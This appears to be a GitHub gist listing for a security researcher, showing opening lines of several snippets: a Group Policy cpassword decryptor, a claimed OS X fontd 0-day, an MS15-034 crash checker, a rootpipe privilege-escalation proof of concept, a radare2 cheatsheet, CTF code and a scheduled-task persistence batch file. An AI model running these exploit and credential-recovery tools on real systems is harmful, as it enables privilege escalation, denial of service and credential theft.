Skip to content

Instantly share code, notes, and snippets.

View ahhh's full-sized avatar
👾
danger code

Dan Borges ahhh

👾
danger code
777 followers · 788 following
View GitHub Profile
@ahhh
ahhh / Gpprefdecrypt.py
Created May 13, 2015 16:00
This tool decrypts the cpassword attribute value embedded in the Groups.xml file stored in the domain controller's Sysvol share.
#!/usr/bin/python
import sys
from Crypto.Cipher import AES
from base64 import b64decode
if(len(sys.argv) != 2):
print "Usage: gpprefdecrypt.py <cpassword>"
sys.exit(0)
@ahhh
ahhh / pass_gen.php
Created May 12, 2015 17:11
generator function to create new mysql hashes for specific applications
<?php
$str = "newpass";
echo sha1($str);
echo "\r\n"
?>
@ahhh
ahhh / epoctime.py
Created May 11, 2015 21:18
Convert from epoc time to gmt time
from time import gmtime, strftime
TIMESTAMP = 1413135372291 #EXAMPLE Replace w/ your values
# print gmtime(TIMESTAMP/1000)
print strftime('%m/%d/%Y %H:%M:%S', gmtime(TIMESTAMP/1000))
@ahhh
ahhh / paste_solve.py
Created May 3, 2015 17:25
VolgaCTF 2015 Quals Interstellar
offset = "01111101001000101000000111101001001011111110010011100111010011000010101101110110100001101011100101001110000000001101000110001011011010101001000000010010001100011001100011001011010101111011110110001100101100101000110011101111101101000110110010101001100100110100010101101111101111011001100011111101"
string = "From a seed a mighty trunk may grow.\n"
#string_entered = "01000110011100100110111101101101001000000110000100100000011100110110010101100101011001000010000001100001001000000110110101101001011001110110100001110100011110010010000001110100011100100111010101101110011010110010000001101101011000010111100100100000011001110111001001101111011101110010111000001010"
tmp = len(offset)
result = [None] * tmp
'''finalString = []
@ahhh
ahhh / ca.py
Last active August 29, 2015 14:20 — forked from vitapluvia/ca.py
#!/usr/bin/env python
import random
import sys
import time
import Image
#ROW_AMT = 11185
ROW_AMT = 285
COL_AMT = 290
@ahhh
ahhh / 0day.c
Created April 30, 2015 19:23
OS X 0-day April30 2015
OS X 0day - works on latest verz
BO exploitation @ fontd, allows payload to run code with fontd privileges.
#include <stdio.h>
#include <stdlib.h>
#include <mach/mach.h>
#include <servers/bootstrap.h>
#define SERVICE_NAME "com.apple.FontObjectsServer"
@ahhh
ahhh / CVE-2015-1635.py
Created April 15, 2015 18:16
Used to check for CVE-2015-1635 / MS15-034 which can lead to remote code execution. Currently when sending a request it can trigger a blue screen on the Windows Server, effectively rendering it offline.
'''
___. .___ __ __
\_ |__ ____ ___.__. ____ ____ __| _// |________ __ __ _______/ |_
| __ \_/ __ < | |/ _ \ / \ / __ |\ __\_ __ \ | \/ ___/\ __\
| \_\ \ ___/\___ ( <_> ) | \/ /_/ | | | | | \/ | /\___ \ | |
|___ /\___ > ____|\____/|___| /\____ | |__| |__| |____//____ > |__|
\/ \/\/ \/ \/ \/
MS15-034 Checker
Danger! This script has not been properly qa'd and will probably fail in terrible ways.
@ahhh
ahhh / r2_cheatsheet
Created April 11, 2015 02:07
radare2 cheatsheet
Radare2 CheatSheet:
===================
? General Help for All Commands
pd [N] Print Disassembly of N Opcodes
pa jmp 0x01 Assemble Opcodes
pcp Dump Python Byte Code / C Byte Code with [pc]
iz List Strings
is List Symbols
iI List Binary Info
s [addr] Seek to Address
@ahhh
ahhh / CVE-2015-1130.py
Last active August 29, 2015 14:18
Exploit code for privilege escalation on OS X 10.7.*, 10.8.*, 10.9.* and 10.10.2
########################################################
#
# PoC exploit code for rootpipe (CVE-2015-1130)
#
# Created by Emil Kvarnhammar, TrueSec
# https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/
#
# Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2
#
########################################################
@ahhh
ahhh / at.bat
Created April 6, 2015 16:29
Windows scheduled task to run a specific time
sc config schedule start= auto
net start schedule
at 10:20 ""C:\Python32\python.exe C:\Windows\Temp\client.py""